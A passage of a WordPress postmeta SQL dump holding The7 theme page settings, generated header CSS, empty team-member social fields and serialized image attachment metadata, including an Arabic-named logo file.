(32847,4582,'_dt_teammate_options_flickr',''),
(32848,4582,'_dt_teammate_options_lastfm',''),
(32849,4582,'_dt_teammate_options_linkedin',''),
(32850,4582,'_dt_teammate_options_vimeo',''),
(32851,4582,'_dt_teammate_options_tumbler',''),
(32852,4582,'_dt_teammate_options_pinterest',''),
(32853,4582,'_dt_teammate_options_devian',''),
(32854,4582,'_dt_teammate_options_skype',''),
(32855,4582,'_dt_teammate_options_github',''),
(32856,4582,'_dt_teammate_options_instagram',''),
(32857,4582,'_dt_teammate_options_stumbleupon',''),
(32858,4582,'_dt_teammate_options_behance',''),
(32859,4582,'_dt_teammate_options_px-500',''),
(32860,4582,'_dt_teammate_options_tripedvisor',''),
(32861,4582,'_dt_teammate_options_vk',''),
(32862,4582,'_dt_teammate_options_foursquare',''),
(32863,4582,'_dt_teammate_options_xing',''),
(32864,4582,'_dt_teammate_options_weibo',''),
(32865,4582,'_dt_teammate_options_odnoklassniki',''),
(32866,4582,'_dt_teammate_options_research-gate',''),
(32867,4582,'_dt_teammate_options_yelp',''),
(32868,4582,'_dt_teammate_options_blogger',''),
(32869,4582,'_dt_teammate_options_soundcloud',''),
(32870,4582,'_dt_teammate_options_viber',''),
(32871,4582,'_dt_teammate_options_whatsapp',''),
(32872,4582,'_dt_teammate_options_reddit',''),
(32873,4582,'_dt_teammate_options_snapchat',''),
(32874,4582,'_dt_teammate_options_telegram',''),
(32875,4582,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(32876,4583,'_edit_lock','1692387028:1'),
(32877,4583,'_thumbnail_id','4581'),
(32878,4583,'_edit_last','1'),
(32879,4583,'_dt_sidebar_position','disabled'),
(32880,4583,'_dt_sidebar_widgetarea_id','sidebar_1'),
(32881,4583,'_dt_sidebar_hide_on_mobile','0'),
(32882,4583,'_dt_footer_show','1'),
(32883,4583,'_dt_footer_widgetarea_id','sidebar_2'),
(32884,4583,'_dt_footer_hide_on_mobile','0'),
(32885,4583,'_dt_header_title','fancy'),
(32886,4583,'_dt_header_background','normal'),
(32887,4583,'_dt_header_background_below_slideshow','disabled'),
(32888,4583,'_dt_header_transparent_bg_color_scheme','light'),
(32889,4583,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(32890,4583,'_dt_header_transparent_top_bar_bg_opacity','25'),
(32891,4583,'_dt_header_transparent_bg_color','#000000'),
(32892,4583,'_dt_header_transparent_bg_opacity','50'),
(32893,4583,'_dt_header_disabled_background','normal'),
(32894,4583,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(32895,4583,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(32896,4583,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(32897,4583,'_dt_header_disabled_transparent_bg_color','#000000'),
(32898,4583,'_dt_header_disabled_transparent_bg_opacity','50'),
(32899,4583,'_dt_page_overrides_top_margin',''),
(32900,4583,'_dt_page_overrides_right_margin',''),
(32901,4583,'_dt_page_overrides_bottom_margin',''),
(32902,4583,'_dt_page_overrides_left_margin',''),
(32903,4583,'_dt_mobile_page_padding_top',''),
(32904,4583,'_dt_mobile_page_padding_right',''),
(32905,4583,'_dt_mobile_page_padding_bottom',''),
(32906,4583,'_dt_mobile_page_padding_left',''),
(32907,4583,'_dt_fancy_header_layout_heading',''),
(32908,4583,'_dt_fancy_header_title_aligment','center'),
(32909,4583,'_dt_fancy_header_height','300'),
(32910,4583,'_dt_fancy_header_padding-top','0px'),
(32911,4583,'_dt_fancy_header_padding-bottom','0px'),
(32912,4583,'_dt_fancy_header_breadcrumbs_heading',''),
(32913,4583,'_dt_fancy_header_breadcrumbs','disabled'),
(32914,4583,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(32915,4583,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(32916,4583,'_dt_fancy_header_title_heading',''),
(32917,4583,'_dt_fancy_header_title_mode','generic'),
(32918,4583,'_dt_fancy_header_title',''),
(32919,4583,'_dt_fancy_header_title_font_size','30'),
(32920,4583,'_dt_fancy_header_title_line_height','36'),
(32921,4583,'_dt_fancy_header_text_transform','none'),
(32922,4583,'_dt_fancy_header_title_color_mode','color'),
(32923,4583,'_dt_fancy_header_title_color','#ffffff'),
(32924,4583,'_dt_fancy_header_subtitle_heading',''),
(32925,4583,'_dt_fancy_header_subtitle',''),
(32926,4583,'_dt_fancy_header_subtitle_font_size','18'),
(32927,4583,'_dt_fancy_header_subtitle_line_height','26'),
(32928,4583,'_dt_fancy_header_subtitle_text_transform','none'),
(32929,4583,'_dt_fancy_header_subtitle_color_mode','color'),
(32930,4583,'_dt_fancy_header_subtitle_color','#ffffff'),
(32931,4583,'_dt_fancy_header_bg_heading',''),
(32932,4583,'_dt_fancy_header_bg_color','#222222'),
(32933,4583,'_dt_fancy_header_bg_image_origin','custom'),
(32934,4583,'_dt_fancy_header_bg_image','a:0:{}'),
(32935,4583,'_dt_fancy_header_bg_repeat','no-repeat'),
(32936,4583,'_dt_fancy_header_bg_position_x','center'),
(32937,4583,'_dt_fancy_header_bg_position_y','center'),
(32938,4583,'_dt_fancy_header_bg_fullscreen','1'),
(32939,4583,'_dt_fancy_header_bg_overlay','0'),
(32940,4583,'_dt_fancy_header_overlay_color','#000'),
(32941,4583,'_dt_fancy_header_bg_overlay_opacity','50'),
(32942,4583,'_dt_fancy_header_scroll_effect','default'),
(32943,4583,'_dt_fancy_header_bg_parallax','0.5'),
(32944,4583,'_dt_fancy_header_responsiveness_heading',''),
(32945,4583,'_dt_fancy_header_responsiveness','disabled'),
(32946,4583,'_dt_fancy_header_responsiveness_switch','778px'),
(32947,4583,'_dt_fancy_header_responsive_height','70'),
(32948,4583,'_dt_fancy_header_responsive_font_size','30'),
(32949,4583,'_dt_fancy_header_responsive_title_line_height','38'),
(32950,4583,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(32951,4583,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(32952,4583,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(32953,4583,'_dt_teammate_options_go_to_single','1'),
(32954,4583,'_dt_teammate_options_position',''),
(32955,4583,'_dt_teammate_options_website',''),
(32956,4583,'_dt_teammate_options_mail',''),
(32957,4583,'_dt_teammate_options_facebook',''),
(32958,4583,'_dt_teammate_options_twitter',''),
(32959,4583,'_dt_teammate_options_dribbble',''),
(32960,4583,'_dt_teammate_options_you-tube',''),
(32961,4583,'_dt_teammate_options_rss',''),
(32962,4583,'_dt_teammate_options_delicious',''),
(32963,4583,'_dt_teammate_options_flickr',''),
(32964,4583,'_dt_teammate_options_lastfm',''),
(32965,4583,'_dt_teammate_options_linkedin',''),
(32966,4583,'_dt_teammate_options_vimeo',''),
(32967,4583,'_dt_teammate_options_tumbler',''),
(32968,4583,'_dt_teammate_options_pinterest',''),
(32969,4583,'_dt_teammate_options_devian',''),
(32970,4583,'_dt_teammate_options_skype',''),
(32971,4583,'_dt_teammate_options_github',''),
(32972,4583,'_dt_teammate_options_instagram',''),
(32973,4583,'_dt_teammate_options_stumbleupon',''),
(32974,4583,'_dt_teammate_options_behance',''),
(32975,4583,'_dt_teammate_options_px-500',''),
(32976,4583,'_dt_teammate_options_tripedvisor',''),
(32977,4583,'_dt_teammate_options_vk',''),
(32978,4583,'_dt_teammate_options_foursquare',''),
(32979,4583,'_dt_teammate_options_xing',''),
(32980,4583,'_dt_teammate_options_weibo',''),
(32981,4583,'_dt_teammate_options_odnoklassniki',''),
(32982,4583,'_dt_teammate_options_research-gate',''),
(32983,4583,'_dt_teammate_options_yelp',''),
(32984,4583,'_dt_teammate_options_blogger',''),
(32985,4583,'_dt_teammate_options_soundcloud',''),
(32986,4583,'_dt_teammate_options_viber',''),
(32987,4583,'_dt_teammate_options_whatsapp',''),
(32988,4583,'_dt_teammate_options_reddit',''),
(32989,4583,'_dt_teammate_options_snapchat',''),
(32990,4583,'_dt_teammate_options_telegram',''),
(32991,4583,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(32992,4592,'_wp_attached_file','2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2.jpg'),
(32993,4592,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1530;s:6:\"height\";i:560;s:4:\"file\";s:156:\"2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2.jpg\";s:8:\"filesize\";i:264525;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:156:\"شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11569;}s:5:\"large\";a:5:{s:4:\"file\";s:157:\"شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-1024x375.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54432;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:156:\"شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5975;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:156:\"شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-768x281.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38830;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:156:\"شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-500x183.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22704;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:156:\"شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-800x293.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:293;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40661;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:157:\"شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-1280x468.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71396;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:34:\"خلفية غامقة وفاتحة\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(32994,4597,'_wp_attached_file','2023/06/giscon.jpg'),
(32995,4597,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1067;s:6:\"height\";i:790;s:4:\"file\";s:18:\"2023/06/giscon.jpg\";s:8:\"filesize\";i:135962;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"giscon-300x222.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11643;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"giscon-1024x758.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:758;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46537;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"giscon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6542;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"giscon-768x569.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:569;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33329;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"giscon-500x370.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:370;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20842;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:18:\"giscon-800x592.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:592;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34716;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(32996,4611,'_edit_lock','1685792097:1'),
(32997,4611,'_edit_last','1'),
(32998,4611,'_dt_sidebar_position','disabled'),
(32999,4611,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33000,4611,'_dt_sidebar_hide_on_mobile','0'),
(33001,4611,'_dt_footer_show','1'),
(33002,4611,'_dt_footer_widgetarea_id','sidebar_2'),
(33003,4611,'_dt_footer_hide_on_mobile','0'),
(33004,4611,'_dt_header_title','fancy'),
(33005,4611,'_dt_header_background','normal'),
(33006,4611,'_dt_header_background_below_slideshow','disabled'),
(33007,4611,'_dt_header_transparent_bg_color_scheme','light'),
(33008,4611,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33009,4611,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33010,4611,'_dt_header_transparent_bg_color','#000000'),
(33011,4611,'_dt_header_transparent_bg_opacity','50'),
(33012,4611,'_dt_header_disabled_background','normal'),
(33013,4611,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33014,4611,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33015,4611,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33016,4611,'_dt_header_disabled_transparent_bg_color','#000000'),
(33017,4611,'_dt_header_disabled_transparent_bg_opacity','50'),
(33018,4611,'_dt_page_overrides_top_margin',''),
(33019,4611,'_dt_page_overrides_right_margin',''),
(33020,4611,'_dt_page_overrides_bottom_margin',''),
(33021,4611,'_dt_page_overrides_left_margin',''),
(33022,4611,'_dt_mobile_page_padding_top',''),
(33023,4611,'_dt_mobile_page_padding_right',''),
(33024,4611,'_dt_mobile_page_padding_bottom',''),
(33025,4611,'_dt_mobile_page_padding_left',''),
(33026,4611,'_dt_fancy_header_layout_heading',''),
(33027,4611,'_dt_fancy_header_title_aligment','center'),
(33028,4611,'_dt_fancy_header_height','300'),
(33029,4611,'_dt_fancy_header_padding-top','0px'),
(33030,4611,'_dt_fancy_header_padding-bottom','0px'),
(33031,4611,'_dt_fancy_header_breadcrumbs_heading',''),
(33032,4611,'_dt_fancy_header_breadcrumbs','disabled'),
(33033,4611,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33034,4611,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33035,4611,'_dt_fancy_header_title_heading',''),
(33036,4611,'_dt_fancy_header_title_mode','generic'),
(33037,4611,'_dt_fancy_header_title',''),
(33038,4611,'_dt_fancy_header_title_font_size','30'),
(33039,4611,'_dt_fancy_header_title_line_height','36'),
(33040,4611,'_dt_fancy_header_text_transform','none'),
(33041,4611,'_dt_fancy_header_title_color_mode','color'),
(33042,4611,'_dt_fancy_header_title_color','#ffffff'),
(33043,4611,'_dt_fancy_header_subtitle_heading',''),
(33044,4611,'_dt_fancy_header_subtitle',''),
(33045,4611,'_dt_fancy_header_subtitle_font_size','18'),
(33046,4611,'_dt_fancy_header_subtitle_line_height','26'),
(33047,4611,'_dt_fancy_header_subtitle_text_transform','none'),
(33048,4611,'_dt_fancy_header_subtitle_color_mode','color'),
(33049,4611,'_dt_fancy_header_subtitle_color','#ffffff'),
(33050,4611,'_dt_fancy_header_bg_heading',''),
(33051,4611,'_dt_fancy_header_bg_color','#222222'),
(33052,4611,'_dt_fancy_header_bg_image_origin','custom'),
(33053,4611,'_dt_fancy_header_bg_image','a:0:{}'),
(33054,4611,'_dt_fancy_header_bg_repeat','no-repeat'),
(33055,4611,'_dt_fancy_header_bg_position_x','center'),
(33056,4611,'_dt_fancy_header_bg_position_y','center'),
(33057,4611,'_dt_fancy_header_bg_fullscreen','1'),
(33058,4611,'_dt_fancy_header_bg_overlay','0'),
(33059,4611,'_dt_fancy_header_overlay_color','#000'),
(33060,4611,'_dt_fancy_header_bg_overlay_opacity','50'),
(33061,4611,'_dt_fancy_header_scroll_effect','default'),
(33062,4611,'_dt_fancy_header_bg_parallax','0.5'),
(33063,4611,'_dt_fancy_header_responsiveness_heading',''),
(33064,4611,'_dt_fancy_header_responsiveness','enabled'),
(33065,4611,'_dt_fancy_header_responsiveness_switch','778px'),
(33066,4611,'_dt_fancy_header_responsive_height','70'),
(33067,4611,'_dt_fancy_header_responsive_font_size','30'),
(33068,4611,'_dt_fancy_header_responsive_title_line_height','38'),
(33069,4611,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33070,4611,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33071,4611,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33072,4611,'_dt_teammate_options_go_to_single','1'),
(33073,4611,'_dt_teammate_options_position',''),
(33074,4611,'_dt_teammate_options_website',''),
(33075,4611,'_dt_teammate_options_mail',''),
(33076,4611,'_dt_teammate_options_facebook',''),
(33077,4611,'_dt_teammate_options_twitter',''),
(33078,4611,'_dt_teammate_options_dribbble',''),
(33079,4611,'_dt_teammate_options_you-tube',''),
(33080,4611,'_dt_teammate_options_rss',''),
(33081,4611,'_dt_teammate_options_delicious',''),
(33082,4611,'_dt_teammate_options_flickr',''),
(33083,4611,'_dt_teammate_options_lastfm',''),
(33084,4611,'_dt_teammate_options_linkedin',''),
(33085,4611,'_dt_teammate_options_vimeo',''),
(33086,4611,'_dt_teammate_options_tumbler',''),
(33087,4611,'_dt_teammate_options_pinterest',''),
(33088,4611,'_dt_teammate_options_devian',''),
(33089,4611,'_dt_teammate_options_skype',''),
(33090,4611,'_dt_teammate_options_github',''),
(33091,4611,'_dt_teammate_options_instagram',''),
(33092,4611,'_dt_teammate_options_stumbleupon',''),
(33093,4611,'_dt_teammate_options_behance',''),
(33094,4611,'_dt_teammate_options_px-500',''),
(33095,4611,'_dt_teammate_options_tripedvisor',''),
(33096,4611,'_dt_teammate_options_vk',''),
(33097,4611,'_dt_teammate_options_foursquare',''),
(33098,4611,'_dt_teammate_options_xing',''),
(33099,4611,'_dt_teammate_options_weibo',''),
(33100,4611,'_dt_teammate_options_odnoklassniki',''),
(33101,4611,'_dt_teammate_options_research-gate',''),
(33102,4611,'_dt_teammate_options_yelp',''),
(33103,4611,'_dt_teammate_options_blogger',''),
(33104,4611,'_dt_teammate_options_soundcloud',''),
(33105,4611,'_dt_teammate_options_viber',''),
(33106,4611,'_dt_teammate_options_whatsapp',''),
(33107,4611,'_dt_teammate_options_reddit',''),
(33108,4611,'_dt_teammate_options_snapchat',''),
(33109,4611,'_dt_teammate_options_telegram',''),
(33110,4611,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33111,4613,'_wp_attached_file','2023/06/dr-alaa.jpg'),
(33112,4613,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:162;s:6:\"height\";i:214;s:4:\"file\";s:19:\"2023/06/dr-alaa.jpg\";s:8:\"filesize\";i:42496;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"dr-alaa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5312;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(33113,4611,'_thumbnail_id','4613'),
(33114,4611,'_wp_old_date','2023-06-03'),
(33115,4611,'rs_page_bg_color',''),
(33116,4611,'_wp_old_date','2022-06-03'),
(33117,4614,'_wp_attached_file','2023/06/dr-alaa-1-e1686349689942.jpg'),
(33118,4614,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:162;s:6:\"height\";i:170;s:4:\"file\";s:36:\"2023/06/dr-alaa-1-e1686349689942.jpg\";s:8:\"filesize\";i:42496;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"dr-alaa-1-e1686349689942-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5427;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(33119,2270,'dt-img-hide-title','0'),
(33120,4627,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1685609158984{margin-top: 100px !important;}.vc_custom_1685609109195{margin-top: 0px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684969898333{margin-top: 5px !important;}.vc_custom_1684305185157{margin-top: 40px !important;}.vc_custom_1684969841504{margin-top: 20px !important;}.vc_custom_1685609238799{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px 